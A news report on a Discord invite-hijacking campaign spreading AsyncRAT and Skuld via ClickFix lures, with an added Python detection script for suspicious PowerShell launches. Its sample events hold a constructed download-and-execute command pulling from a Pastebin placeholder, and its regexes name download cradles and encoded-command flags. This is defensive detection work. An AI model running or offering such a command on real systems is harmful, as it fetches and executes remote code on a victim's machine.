Hackers exploit Discord invite system to spread info-stealers and RATs

A new malicious campaign is abusing a loophole in Discord’s invitation system to distribute malware, including the AsyncRAT remote access trojan and a modified variant of the Skuld information stealer, according to cybersecurity researchers at Check Point.

The attackers hijacked expired or deleted vanity invite links on Discord, redirecting users from legitimate communities to malicious servers under their control.

Once inside the rogue server, users are prompted to complete a so-called ‘verification’ step. In reality, this is a phishing attempt using the ClickFix tactic. Victims are tricked into copying and running a malicious PowerShell command disguised as a verification process. The command initiates a stealthy infection chain, eventually delivering AsyncRAT and the Skuld Stealer.

AsyncRAT enables full remote control over an infected device and uses a technique called a ‘dead drop resolver’ to connect to its command-and-control (C2) server via Pastebin. Meanwhile, Golang-based Skuld harvests sensitive data from browsers, Discord, gaming platforms, and crypto wallets such as Exodus and Atomic. It even replaces legitimate app files with trojanized versions downloaded from GitHub using the wallet injection technique.

The campaign’s infrastructure leverages trusted cloud services like GitHub, Pastebin, Bitbucket, and Discord itself, allowing it to evade traditional security detection.
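The three observable traits described above (a ClickFix lure that has the victim paste a PowerShell one-liner, a dead-drop resolver fetching the next stage from Pastebin, and staging on trusted hosts such as GitHub, Bitbucket and Discord’s CDN) can be turned into a simple process-creation triage rule. The following is an added example, not code from the article or from Check Point; the event dictionaries, host list, indicator weights and the score threshold are all constructed for illustration and would need tuning against real Sysmon Event ID 1 or Windows 4688 telemetry.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Hosts the article names as the campaign's staging / dead-drop infrastructure.
# Constructed list: in production this would come from threat intel, not a literal.
DEAD_DROP_HOSTS = {
    "pastebin.com",
    "raw.githubusercontent.com",
    "github.com",
    "bitbucket.org",
    "cdn.discordapp.com",
}

# (name, pattern, weight). Weights are illustrative, not empirically derived.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("download_cradle",
     re.compile(r"\b(?:iex|invoke-expression)\b.*\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I),
     3),
    ("bypass_policy", re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1),
]
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
ALERT_THRESHOLD = 4


@dataclass
class Finding:
    event_id: str
    score: int
    indicators: list = field(default_factory=list)


def extract_hosts(cmdline: str) -> list:
    """Return every hostname referenced by a URL in the command line."""
    return [h.lower() for h in URL_RE.findall(cmdline)]


def score_event(event: dict) -> Optional[Finding]:
    """Score one process-creation event; return a Finding if it crosses the threshold."""
    cmd = event["command_line"]
    hits, score = [], 0
    for name, rx, weight in INDICATORS:
        if rx.search(cmd):
            hits.append(name)
            score += weight
    # Dead-drop resolver / trusted-host staging: the next stage is fetched
    # from a legitimate service, so the URL host alone is not enough to block.
    hosts = [h for h in extract_hosts(cmd) if h in DEAD_DROP_HOSTS]
    if hosts:
        hits.append("dead_drop_host:" + ",".join(hosts))
        score += 2
    # ClickFix lures have the user paste into the Run dialog, so the PowerShell
    # process is typically spawned directly by explorer.exe rather than by a
    # scheduler, installer or admin shell.
    if event.get("parent_image", "").lower().endswith("explorer.exe"):
        hits.append("parent_explorer")
        score += 1
    if score >= ALERT_THRESHOLD:
        return Finding(event_id=event["id"], score=score, indicators=hits)
    return None


def triage(events: list) -> list:
    """Run score_event over a batch and keep only the flagged events."""
    return [f for f in (score_event(e) for e in events) if f is not None]


# Constructed sample events in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {   # ClickFix-style paste: hidden window, policy bypass, cradle pulling from Pastebin
        "id": "1",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": 'powershell -w hidden -ep bypass -c "iex (iwr https://pastebin.com/raw/PLACEHOLDER)"',
    },
    {   # Benign scheduled maintenance script launched from a cmd.exe wrapper
        "id": "2",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1",
    },
    {   # Encoded command pasted by a user (constructed base64 placeholder, not a real payload)
        "id": "3",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe -NoProfile -EncodedCommand QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA",
    },
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"event {finding.event_id}: score={finding.score} indicators={finding.indicators}")
```

The point of the scoring approach is that none of the individual traits is malicious on its own: administrators use hidden windows and encoded commands, and developers fetch from GitHub constantly. What characterises the chain described in the article is the combination of a user-driven launch, a download cradle, and a next stage hosted on a service the organisation already trusts, which is why a single-indicator block rule would either miss it or drown the SOC in false positives.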

Discord has since disabled the malicious bot, disrupting the attack chain. However, Check Point also discovered a parallel operation by the same threat actor involving a fake game hacktool, which was downloaded over 350 times, that delivers the same loader.

Victims appear to be largely located in the US, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the UK.
